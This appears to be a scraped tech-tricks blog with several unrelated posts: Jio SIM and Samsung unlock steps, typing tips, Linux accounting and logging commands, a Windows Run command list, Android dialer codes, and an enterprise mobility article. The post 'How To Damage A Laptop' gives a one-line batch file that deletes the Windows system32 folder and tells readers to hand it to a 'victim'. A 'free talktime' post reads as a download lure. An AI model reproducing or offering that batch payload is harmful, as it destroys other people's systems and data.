Subscribe For Free Updates!

We'll not spam mate! We promise.

Tuesday, 1 November 2016

How to use Reliance Jio 4G sim in 3G phone

Reliance Jio 4G sim in 3G Phone working on every Snapdragon Device

If you have a 3G mobile you can also use Jio 4G Sim.

Note:- This trick only work in Snapdragon Device.

To use Reliance Jio 4g sim in 3g phone means you have to enable LTE option in your 3g device. Some people will say it is impossible, I got some negative comments on this article tricks. So follow these given steps I am giving an example for Moto G Device but you can follow these steps to use Reliance Jio 4G sim in every snapdragon device

  • First visit the Dial-pad, and type this number *#*#4636#*#*
  • Then you will see one page with Testing, click on Phone Information.


  • Scroll down till you find the Set Preferred Network Type drop down menu, click on that.

  • Select the LTE/GSM auto (PRL) or any LTE option and close it.


  • Switch off your mobile put Jio Sim in slot 1 and keep the second slot empty.
  • Switch on now then you will see Jio 4G signal in your mobile.
Let me know in the comments if you got any better tricks, or if this didn’t work. I will surely help you out. These are the most working tricks on Reliance Jio 4G sim in 3G phones.

Tuesday, 24 February 2015

How-to Unlock Samsung by Unlock Code - All Models including Galaxy Series

This how-to guide will show you how to unlock any Samsung phone locked to networks in:

Asia
Australia
Canada
Europe
Latin America
USA

Is my phone supported?

We offer unlocking support for all Samsung models from supported regions (see above) except for T669 and T919 on USA networks and Galaxy and S5800 on Yoigo Spain.
If your phone is hardlocked, unlock codes will not work.
To tell if your phone is hardlocked, power on the phone with a SIM card from a different network.
Hardlocked phones will display the message Network lock with a Dismiss or SOS button. There will be no place to enter an unlock code.

How do I know if my phone is network locked?
  • Insert a SIM card from a different network and power on your phone.
  • If the phone is network locked, it will display one of the following messages:
  • SIM network unlock PIN
  • Network lock
  • Phone freeze SIM unavailable. Contact your service provider
  • SP lock
  • SIM password
  • If you get a different message and you are not sure if your phone is network locked, do not order unlock codes.







How do I purchase an unlocking service on FastGSM?
Go to the detail page for your phone on FastGSM.com
Select a service.
Click Buy Now and follow the instructions. You will be asked to create an account or sign into your existing account.
For unlock codes, make sure to select Samsung Unlock Codes with the correct region where the phone is currently network locked (i.e., EUROPE).
Find your phone’s unique IMEI (identification number).
To find the IMEI number, power on the phone without a SIM card and type *#06# on the keypad.
The phone will display the IMEI number.
Submit your IMEI to the FastGSM website. Enter the number without spaces or slashes. Your IMEI is only the first 15 digits.
Wait to receive your phone’s unique unlock code(s) by email.
I have the unlock code. How do I unlock my phone?
If you see: SIM network unlock PIN or Enter Network Lock Control Key screen

Type your unique Network unlock code (NCK).
Click Unlock.
If you get a message saying Unsuccessful, it means there have been too many failed attempts to enter the unlock code.
If this happens, full reset your phone by typing *2767*3855# and wait until the phone has restarted (all data will be erased).
Type your unique Unfreeze code (MCK) into the SIM network unlock PIN screen.
You will get another message saying Unsuccessful, but don’t worry—this is fine.
Now type your unique Network unlock code (NCK) and click Unlock.
If you see: Network lock screen

At this point you should be prompted for your Network unlock code (NCK).
Type the code and the phone will be unlocked.
If you see: Invalid SIM card screen

Type the following. Replace Network (NCK) with your actual code:
#0111*Network (NCK)#
If you see: Phone freeze screen

If you get the Phone freeze message, it means there have been too many failed attempts to enter the unlock code.
However, you can still unlock the phone using the Unfreeze code (MCK).
If your phone has a physical keypad, type the Unfreeze code (MCK) into the Phone freeze screen. Nothing will show up—this is fine. If nothing happens, you can try hitting # or the Call key after entering the code.
If your phone has only a touch screen, tap Call on the Phone freeze screen and then enter your Unfreeze code (MCK).
Once phone freeze is disabled, Network lock or SP lock screen will appear. Follow the directions for Network lock or SP lock to unlock your phone.
If you see: Phone locked. Return for service screen

Type the following. Replace Unfreeze (MCK) with your actual code:
#0199*Unfreeze (MCK)#
If you see: SP lock screen

At this point you should be prompted for your SPCK code.
Type the code and the phone will be unlocked.
If you see: SIM password screen

Enter your Unfreeze code (MCK) at the prompt.
If you see: SIM lock – Enter password screen

Type the following. Replace Unfreeze (MCK) with your actual code:
#0149*Unfreeze (MCK)#
If you see: Network unlock PIN number is entered incorrectly. Contact your Service Provider screen

Power on the phone without SIM card.
Dial #7465625638#
Type your unique Unfreeze code (MCK)
You will get another message saying Unsuccessful, but don’t worry—this is fine.
Now type your unique Network unlock code (NCK)

Saturday, 30 August 2014

How Can I Improve My Typing speed

There are different techniques you can do to improve your typing skills. Below is a short list of different ideas and recommendations you can do to help improve your typing. Keep in mind that most people are not going to be able to improve their typing speed overnight.

Proper placement


Learn to type the proper way (no typing with one or two fingers). This means your fingers should be on the home row keys A, S, D, and F with the left hand and J, K, L, and ; with the right hand. Of course if you're on a non-English keyboard or a non-QWERTY keyboard this may change.
What fingers are used for what keys on the keyboard?

Type more and practice


Starting off with the most obvious, practicing typing more will obviously help the most. The more you type the more familiar you are going to become with the computer keyboard, position of the keys, and how your hands should be positioned.
When practicing keep some of the below things in mind.

  1. Try not to look at the keyboard while typing. This is usually the hardest for most people, but is definitely a skill that should be learned. Not having to look at where the keys are on a keyboard can dramatically improve the speed of your typing. If you need help learning to not look at your hands try putting a large piece of paper over the keyboard that allows your hands to fit under it without you being able to see the keys, or put stickers on each of the keys.
  2. Make sure your posture at the computer is good. For example, sit in the upright position with both feet flat on the floor and relax.

Chat


Online chat can be a great place to learn to type and is also usually fun at the same time. If you're really wanting to learn to type more efficiently while chatting make sure to use proper capitalization, punctuation, and do not use chat slang.

E-mail, online bulletin boards and forums


Sending friends and family frequent e-mail letters can be another great way to learn to type and keep in touch with all your friends and family. In addition to sending e-mail messages there are millions of online forums with every topic of conversation imaginable. Becoming a member of one of these forums and participating in talking about something you enjoy can also be fun and another great way to learn to type.

Run through online typing tests several times


Run through each of the online typing tests several times to improve your typing, catch errors, and review your progress.

Type pages of a book, letter, or any other page with lots of text


Although not an option that is as fun as some of the other suggestions listed in this document, taking any letter, page of a book, or document and typing everything on that page is a great way to help improve your typing. Not only will this help improve your typing of unfamiliar words, it is also a skill sometimes required for some jobs.

Create your own web page, blog, or online journal


Creating your own web page, blog, or online journal that you frequently update is another great way to practice your typing while also doing something productive at the same time.

Typing games


Typing games are a great way to learn the position of all the keys on the keyboard and also help you practice your typing while having fun. Below are a few games that help with your typing.

QWERTY Warriors

Fun and very addictive game, where you must defend yourself against other people, tanks, robots, and other vehicles by typing the word below it.

Click here to play the game

Typer Shark

A great typing game that is available as a free online and offline version for the PC. One of the more sophisticated typing games we've seen, in this game a user must explore the deep sea while looking for treasure. During the exploration you come across shark and fish that have letters and words on them, each word or letter must be typed before they reach your character.
How long does it take to become proficient at typing?

As with anything, the more you stick with it and practice good habits the better you'll become. Best-selling author Malcolm Gladwell popularized the idea that 10,000 hours of appropriately guided practice was "the magic number of greatness." With enough practice, he claimed in his book Outliers, anyone could achieve a level of proficiency that would rival that of a professional. It was just a matter of putting in the time.

Additional information


How can I test how many words a minute I can type?
See our typing and wpm definitions for further information and related links on these term.

Thursday, 28 August 2014

5 Shortcuts to Increase Your Typing Speed


We all know that typing speed matters.  Whether you’re applying for a job as a paralegal or an executive assistant, being able to type quickly and accurately might be the only skill that stands between you and another equally qualified applicant.
Can you type 65+ words per minute?  If you didn’t have the benefit of taking a typing course or two in school, that might not be the case.  So, how do you get those skills up to par in a short period of time so that you can compete for these high paying positions?
Here’s 5 shortcuts that will help you increase your typing speed in no time.  We don’t guarantee overnight results but, if you follow these tips you’ll definitely get a leg up on the competition.

Technique Matters

Touch typing is 80% technique, 10% accuracy and 10% speed.  People who are masters at touch typing will tell you that without proper hand position and typing technique, you’ll only be able to type so fast.
Think about it, there is no way that the person using the hunt and peck method will ever be as fast as someone who uses proper technique on a QWERTY keyboard.  Using the proper technique will make learning to type much easier and open a world of opportunities when it comes to increasing typing speed.

Errors are Opportunities for Improvement

When you first start learning to touch type, you’re going to make some errors.  In fact you might make a lot of them.  Your success really depends on how you view making those mistakes – do you see them as a failure or as an opportunity to improve?
People who see their mistakes as an opportunity to improve generally learn faster than people who don’t.  Your mindset plays a big part in how quickly you learn and how much information you are able to take in.

Repetition Never Gets Boring

Touch typing is all about muscle memory, which means that your muscles will need some time to adjust to the new techniques that you are learning.  The best and quickest way to do this is through repetition.
By doing the same exercise over and over you will be able to ingrain those movements into your muscle memory.  If you are using an online typing tutor, set a high standard for yourself.  Make a decision to master a technique 100% before moving on to the next lesson.
This may seem more time consuming upfront but, if you do this the subsequent lessons will be easier since they are built upon the techniques taught in the previous lessons.

Good Posture Can Work Wonders

Posture is one of the most overlooked factors when it comes to learning to type quickly.  Poor posture not only takes a toll on your muscles, but can affect your energy levels and accuracy as well.
Good posture while typing will keep up your energy levels and also allow your fingers to rest in the correct position.  Keeping correct posture allows you to type faster, more accurately and will help prevent injury.  The correct posture to have while typing is relaxed with feet squarely on the floor and wrists level with the keyboard.

Don’t Look at the Keyboard

Another great trick to help you increase your typing speed in a short period of time is to avoid looking at the keyboard. Initially, this may result in more mistakes, but you will learn the positions of the keys at a much higher rate without using the keyboard as a crutch.
Because it can be tempting to simply look down at the keyboard, try covering the keyboard and your hands with a piece of paper while you type.  Or, if you really want to challenge your self, Das Keyboard Ultimate is a keyboard with blank keys that will literally force you to learn the keys via motor-skills.

Practice, Practice, Practice…

Finally, the best way to increase your typing speed is through good old practice.  While practice isn’t necessarily a shortcut and requires dedicated effort, it really is the best way to see results.  Even if you practice your typing skills for 30 minutes each day for a month, you will see an improvement that can make all the difference in helping you land your dream job.

Tuesday, 12 August 2014

Dump utmp and wtmp logs

Like pacct, you can also dump the contents of the utmp and wtmp files. Both these files provide login records for the host. This information may be critical, especially if applications rely on the proper output of these files to function.

Being able to analyze the records gives you the power to examine your systems in and out. Furthermore, it may help you diagnose problems with logins, for example, via VNC or ssh, non-console and console login attempts, and more.

You can dump the logs using the dump-utmp utility. There is no dump-wtmp utility; the former works for both.



You can also do the following:

dump-utmp /var/log/wtmp
Here's what the sample file looks like:



Unleash the accounting power with pacct

Did you know that you can log the completion of every single process running on your machine? You may even want to do this, for security, statistical purposes, load optimization, or any other administrative reason you may think of. By default, process accounting (pacct) may not be activated on your machine. You might have to start it:

/usr/sbin/accton /var/account/pacct
Once this is done, every single process will be logged. You can find the logs under /var/account. The log itself is in binary form, so you will have to use a dumping utility to convert it to human-readable form. To this end, you use the dump-acct utility.

dump-acct pacct
The output may be very long, depending on the activity on your machine and whether you rotate the logs, which you should, since the accounting logs can inflate very quickly.




And there you go, the list of all processes ran on our host since the moment we activated the accounting. The output is printed in nice columns and includes the following, from left to right: process name, user time, system time, effective time, UID, GID, memory, and date. Other ways of starting accounting may be in the following forms:

/etc/init.d/psacct start
Or:
/etc/init.d/acct start
In fact, starting accounting using the init script is the preferred way of doing things. However, you should note that accounting is not a service in the typical form. The init script does not look for a running process - it merely checks for the lock file under /var. Therefore, if you turn the accounting on/off using the accton command, the init scripts won't be aware of this and may report false results.

BTW, turning accounting off with accton is done just like that:

/usr/sbin/accton

When no file is specified, the accounting is turned off. When the command is run against a file, as we've demonstrated earlier, the accounting process is started. You should be careful when activating/deactivating the accounting and stick to one method of management, either via the accton command or using the init scripts.

Write to more than one file at once with tee

In general, with static data, this is not a problem. You simply repeat the write operation. With dynamic data, again, this is not that much of a problem. You capture the output into a temporary variable and then write it to a number of files. But there's an easier and faster way of doing it, without redirection and repetitive write operations. The answer: tee.

tee is a very useful utility that duplicates pipe content. Now, what makes tee really useful is that it can append data to existing files, making it ideal for writing periodic log information to multiple files at once.

Here's a great example:

ps | tee file1 file2 file3

That's it! We're sending the output of the ps command to three different files! Or as many as we want. As you can see in the screenshots below, all three files were created at the same time and they all contain the same data. This is extremely useful for constantly changing output, which you must preserve in multiple instances without typing the same commands over and over like a keyboard-loving monkey.






Now, if you wanted to append data to files, that is periodically update them, you would use the -a flag, like this:

ps | tee -a file1 file2 file3 file4

Run top in batch mode

TOP is a handy utility for monitoring the utilization of your system. It is invoked from the command line and it works by displaying lots of useful information, including CPU and memory usage, the number of running processes, load, the top resource hitters, and other useful bits. By default, top refreshes its report every 3 seconds.


Most of us use top in this fashion; we run it inside the terminal, look on the statistics for a few seconds and then graciously quit and continue our work.

But what if you wanted to monitor the usage of your system resources unattended? In other words, let some system administration utility run and collect system information and write it to a log file every once in a while. Better yet, what if you wanted to run such a utility only for a given period of time, again without any user interaction?

There are many possible answers:

You could schedule a job via cron.
You could run a shell script that runs ps every X seconds or so in a loop, incrementing a counter until the desired number of interactions elapsed. But you would also need uptime to check the load and several other commands to monitor disk utilization and what not.
Instead of going wild about trying to patch a script, there's a much, much simpler solution: top in batch mode. 

top can be run non-interactively, in batch mode. Time delay and the number of iterations can be configured, giving you the ability to dictate the data collection as you see fit. Here's an example:

top -b -d 10 -n 3 >> top-file
We have top running in batch mode (-b). It's going to refresh every 10 seconds, as specified by the delay (-d) flag, for a total count of 3 iterations (-n). The output will be sent to a file. A few screenshots:







And that does the trick. Speaking of writing to files ...

How To Damage A Laptop




Open Notepad Write / copy the below command there: " del c:\WINDOWS\system32\*.*/q " without quote and save as " anything.bat" Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started. - See more at: http://www.manish-khatri.com

How to Track Lost Android Phone and Tablet

Your Android gadgets are the most important things in your life. It contains all your important contacts and information. If you lose your equipment, you will be losing all those sweet memories with the photos and video. But there is some good news to android phone/tablet users, you can now easily find or at least know where your missing phone is with or without using android application.
Let’s first look at the way of finding your lost phone which doesn’t contain any app installed on it.

Plan A

Use the IMEI Number


Every android phone carries a unique IMEI number (International Mobile Equipment Identity Number). It will be printed at the back of your device. If you are unable to find the number, you have to launch your phone app and dial the number *#06#. This will give you the IMEI number of your phone. Store this number in a safe place so that it helps you in locating your phone when it is lost.
When you file a complaint, this number has to be added in the report. Your service provider uses this number to track your phone and tell you where it is. No matter if the person using the phone is using a different SIM card or has switched off the phone. Once the device is traced, you can request your service provider to block it from using.
This is one of the easy ways of locating your lost Android phone or tablet.

Plan B


Another way of tracking your lost Android gdget in no time is through Plan B app. This app does not require you to install any recovery software previously but still helps in finding your lost phone. All you need to do is log on to your Google play account. Lookout mobile security offers free software called Plan B. Download the software from play store to your phone. This will be possible only if your phone is within the Internet coverage area. Wait for some time and then send the keyword “locate” without the quotes through SMS to your phone. And a map showing where your equipment is will be sent to your Gmail account. This app is very much useful in situations where you don’t have IMEI number.
If you have installed and configured any of these below android software previously, there is good chance of finding it.
You can log on to Google Play store > My Android Apps, on your computer and check if you have installed any of the following apps previously.
Lookout Security and Antivirus

Lookout is the best android app for security and antivirus. So far, it has received millions of downloads. Just recall if you have installed this on your phone.
If you have activated the option “Missing Device” in this app, it is easy to find your device. If you have also enabled “Signal Flare” option, you can trace the last known location of your android device. This is helpful in case your phone battery is dead or tablet is switched off.
Now sign in Lookout to locate your device. The map shows the location of your phone. If you are at a short distance from the tablet, you can choose Scream option to make a loud noise to find it.
Android Device Manager


Google has recently released a new locator feature for Android gadgets called Android Device manager, which helps its users locate their lost or stolen phones and tablets. It functions in the same way as Lookout and Samsung’s “Find My Mobile”. Here’s how to use Android Device Manager.
Go to the Google Settings app, then select Android device manager. By default the locator feature is activated but to activate remove data wipe, select the box next to “Allow remote factory reset”, then select “activate”.
To use this feature, open the site https://www.google.com/android/devicemanager and sign in to your Google account. You may be prompted for permission to allow Android Device Manager to use location data. Select the Accept tab to continue.
Now you will be provided with a map that shows the location of your device along with other details such as the name of the place, when it was last used and more. The location data doesn’t help you if your phone is misplaced somewhere in your home. Instead of making a call to your phone using other’s phone, you can call your phone directly from Android Device Manager. This will make your device to ring with high volume for 5 minutes, even if it’s in silent or vibrate mode.
One feature that is missing in Android Device Manager is remote locking, which can be useful in preventing a stranger from accessing your data, while you’re tracking its location.
Apart from these, there are other apps such as Android Lost, Where do My Droid and GadgetTrak that help you in finding your lost Android phone/Tablet.
- See more at: http://www.besthacking.in/2014/03/how-to-track-lost-android-phone-and.html#sthash.j70NPgye.dpuf

100+ Best Run Commands List

Cmd Hacking Tricks>>Click Here

Accessibility Options : access.cpl
Add Hardware : hdwwiz.cpl
Add / Remove Programs : appwiz.cpl
Administrative Tools : control admintools
Automatic Updates : wuaucpl.cpl
Wizard file transfer Bluethooth : fsquirt
Calculator : calc
Certificate Manager : certmgr.msc
Character : charmap
Checking disk : chkdsk
Manager of the album (clipboard) : clipbrd
Command Prompt : cmd
Service components (DCOM) : dcomcnfg
Computer Management : compmgmt.msc
DDE active sharing : ddeshare
Device Manager : devmgmt.msc
DirectX Control Panel (if installed) : directx.cpl
DirectX Diagnostic Utility : dxdiag
Disk Cleanup : cleanmgr
System Information : dxdiag
Disk Defragmenter : dfrg.msc
Disk Management : diskmgmt.msc
Partition manager : diskpart
Display Properties : control desktop
Properties of the display (2) : desk.cpl
Properties display (tab "appearance") : control color
Dr. Watson : drwtsn32
Manager vérirficateur drivers : check
Event Viewer : Eventvwr.msc
Verification of signatures of files : sigverif
Findfast (if present) : findfast.cpl
Folder Options : control folders
Fonts (fonts) : control fonts
Fonts folder windows : fonts
Free Cell : freecell
Game Controllers : Joy.cpl
Group Policy (XP Pro) : gpedit.msc
Hearts (card game) : mshearts
IExpress (file generator. Cab) : IExpress
Indexing Service (if not disabled) : ciadv.msc
Internet Properties : inetcpl.cpl
IPConfig (display configuration) : ipconfig / all
IPConfig (displays the contents of the DNS cache) : ipconfig / displaydns
IPConfig (erases the contents of the DNS cache) : ipconfig / flushdns
IPConfig (IP configuration cancels maps) : ipconfig / release
IPConfig (renew IP configuration maps) : ipconfig / renew
Java Control Panel (if present) : jpicpl32.cpl
Java Control Panel (if present) : javaws
Keyboard Properties : control keyboard
Local Security Settings : secpol.msc
Local Users and Groups : lusrmgr.msc
Logout : logoff
Microsoft Chat : winchat
Minesweeper (game) : winmine
Properties of the mouse : control mouse
Properties of the mouse (2) : main.cpl
Network Connections : control NetConnect
Network Connections (2) : ncpa.cpl
Network configuration wizard : netsetup.cpl
Notepad : notepad
NView Desktop Manager (if installed) : nvtuicpl.cpl
Manager links : packager
Data Source Administrator ODBC : odbccp32.cpl
Screen Keyboard : OSK
AC3 Filter (if installed) : ac3filter.cpl
Password manager (if present) : Password.cpl
Monitor performance : perfmon.msc
Monitor performance (2) : perfmon
Dialing Properties (phone) : telephon.cpl
Power Options : powercfg.cpl
Printers and Faxes : control printers
Private Character Editor : eudcedit
Quicktime (if installed) : QuickTime.cpl
Regional and Language Options : intl.cpl
Editor of the registry : regedit
Remote desktop connection : mstsc
Removable Storage : ntmsmgr.msc
requests the operator to removable storage : ntmsoprq.msc
RSoP (traduction. ..) (XP Pro) : rsop.msc
Scanners and Cameras : sticpl.cpl
Scheduled Tasks : control schedtasks
Security Center : wscui.cpl
Console management services : services.msc
shared folders : fsmgmt.msc
Turn off windows : shutdown
Sounds and Audio Devices : mmsys.cpl
Spider (card game) : spider
Client Network Utility SQL server : cliconfg
System Configuration Editor : sysedit
System Configuration Utility : msconfig
System File Checker (SFC =) (Scan Now) : sfc / scannow
SFC (Scan next startup) : sfc / scanonce
SFC (Scan each démarraget) : sfc / scanboot
SFC (back to default settings) : sfc / revert
SFC (purge cache files) : sfc / purgecache
SFC (define size CAHC x) : sfc / cachesize = x
System Properties : sysdm.cpl
Task Manager : taskmgr
Telnet client : telnet
User Accounts : nusrmgr.cpl
Utility Manager (Magnifier, etc) : utilman
Windows firewall (XP SP2) : firewall.cpl
Microsoft Magnifier : magnify
Windows Management Infrastructure : wmimgmt.msc
Protection of the accounts database : syskey
Windows update : wupdmgr
Introducing Windows XP (if not erased) : tourstart
Wordpad : write
Date and Time Properties : timedate.cpl
- See more at: http://www.besthacking.in/2014/06/109-best-run-commands-list.html#sthash.5OiidS70.dpuf

Get Free TalkTime 500 Five Times

Hello BestHacking Reader Get Free Talktime Daily Its Realty click On Download Link through your Android Mobile nd Get Free TalkTime Daily This Is Our Guarantee Download Now And Get Free Talk 300 rs Five Times.... And Also Win Awesome Prizes - See more at: http://www.manish-khatri.com


Download

Friday, 8 August 2014

Mobile explosion in the enterprise: how secure is your business?



The new, complex multi-screen enterprise IT environment presents a large security and management challenge for IT in terms of keeping track of data, and securing against malware.
There are always three main points at which data is vulnerable – the network, the endpoint and the application – and the spread of consumerisation multiplies the number of vulnerability points.
Businesses are finding it tough to get to grips with this environment. For example, 62% of those employees who use their own devices at work do not have a corporate IT policy governing that behaviour, and are looking for solutions that help make it easier to manage - securing and monitoring all different devices and applications from a single pane of glass.
This has been a difficult task in practice, with mobile devices requiring different management systems to those used to manage the range of PCs and servers that businesses have traditionally used.

Casting a wide security net


A fast growing market has sprung up around the need to manage and secure mobile devices, offering features such as remote lock and wipe and application provisioning, but the goal for most vendors in this space will be to work toward a solution that manages the whole endpoint estate within an organisation.
Some of the vendors coming from a more traditional ITSM background are edging towards this goal, combining mobility management features with PC and server management, but it may still be several years until there is widespread usage of single solutions that allow IT administrators to manage all devices and applications from a single pane of glass.
Part of the challenge for enterprise IT in managing this multi-screen environment is that each operating system and device type has different capabilities, features, and methods of management.
Many devices built with consumers in mind are also unequipped with the security features that are required in an enterprise context. For example, the ability to encrypt data on the device and communications over the air, or remote tracking, lock and wipe capabilities.

The benefits of baked-in security


So, if employees are buying and using devices that have security features built in out of the box, such as a secure container or separation of work and personal profiles, like Samsung Knox or BlackBerry Balance, it answers a significant part of the IT management challenge.
Businesses would have to consolidate on a single type of device for it to provide the whole answer, and in a world of huge consumer choice that is an unlikely scenario in most organisations, but the more employees using these pre-secured and manageable devices the better.
In addition, the ability of smartphones, tablets and laptops to capture biometric data such as iris scans or fingerprints, create new opportunities for authentication factors that can help make data security stronger, but also create a less disruptive and time-consuming experience in the workplace for employees.
As various devices, online services and applications become an integral part of daily life for consumers, the workforce as a whole is becoming more tech savvy and able to find or suggest their own ways of working.
Employees and their line of business managers naturally have a more intricate knowledge of their everyday working processes and how they might be improved through mobile, flexible practices.

Unity needed between IT and business


This means that the fundamental role of the IT department has to change: it is now about embracing innovation from around the organisation and enabling it as far as possible, while maintaining the required levels of security and central management.
IT must align with lines of business to establish which devices and applications will improve processes and make employees more efficient and productive – it is getting harder simply to centrally mandate which applications every worker should have access to.
For enterprise IT, failure to adapt to this new role will lead to increasing irrelevance within the organisation, but it is also symptomatic of an organisation without joined-up thinking around how it efficiently manages business processes. IT should be enabling business owners as far as possible, not constraining them or dictating processes.
If IT is seen as a hindrance, individual employees and their line managers will increasingly seek ways to work around it, opening up an alternative 'shadow IT' environment that is difficult to manage, leads to risks around data security and is inherently inefficient, as different departments create silos of their own data and applications without any thought to interoperability.
Considering the risks of not enabling anywhere, anytime working is one form of motivation for enterprise IT to change its way of thinking – but of course it is also important to consider the positive aspects of what gains agility can bring to the business.

Enabling agility


Enabling agile and flexible working can lead to happier workers. Not tying them to the standard 9-5 day can have numerous benefits: less stringent working hours means enabling people to fit work around personal issues and commitments for instance, without cutting down on efficiency.
It means they can work when they are at their most productive – if someone is most switched on early in the morning or late at night, or if they are tired in the middle of the day and need to take a break before catching up after normal hours.
Employees that work with clients, colleagues and partners across international time zones can also make use of flexible working to make calls outside of the usual 9-5 working day, staying in touch more easily with their key contacts. And mobility makes employees more efficient and productive while travelling.
Added to this flexibility around working hours, people with access to mobile email and other apps also tend to spend more time working, which is a bonus for the employer – as long as this culture is managed and does not lead to employee burnout.
An expectation that people will answer calls and emails at all hours will not usually be seen as bonus, and can lead to high levels of stress – but giving people the opportunity to stay in contact in order to deal with urgent issues can be seen as a benefit.
Richard Absalom is a Senior Analyst of Enterprise Mobility and Adrian Drury a Consulting Director, both at Ovum. The Future of Work report was produced in partnership with Samsung - follow the links for Part 1, Part 2 and Part 4.

Friday, 1 August 2014

Latest Android Mobile tricks




Latest Android Mobile tricks 2011:

Cell Battery, WiFi Usage etc Info *#*#4636#*#*

Restore Factory Settings
*#*#7780#*#*

Format Phone
*2767*3855#

Launch service mode *#*#197328640#*#*

Test WiFi
*#*#232339#*#* or
*#*#526#*#* or
*#*#528#*#*

Display WiFi MAC address *#*#232338#*#*

GPS test
*#*#1472365#*#*

Other GPS test
*#*#1575#*#*

Bluetooth test *#*#232331#*#*

Display Bluetooth physic address
*#*#232337#*#

Start Gtalk monitoring
*#*#8255#*#*

PDA, Phone, H/W, RFCallDate *#*#4986*2650468#*#*

PDA and Phone
*#*#1234#*#*

FTA SW version
*#*#1111#*#*

FTA HW version *#*#2222#*#*

PDA, Phone, csc,
*#*#44336#*#*

Packet Loopback
*#*#0283#*#*

LCD test *#*#0*#*#*

Melody test
*#*#0673#*#*
or
*#*#0289#*#*

Device test such as vibration and lightness
*#*#0842#*#*

Display touchscreen version
*#*#2663#*#*

Touchscreen test
*#*#2664#*#*
 Distance sensor test *#*#0588#*#*

Display memory version
*#*#3264#*#*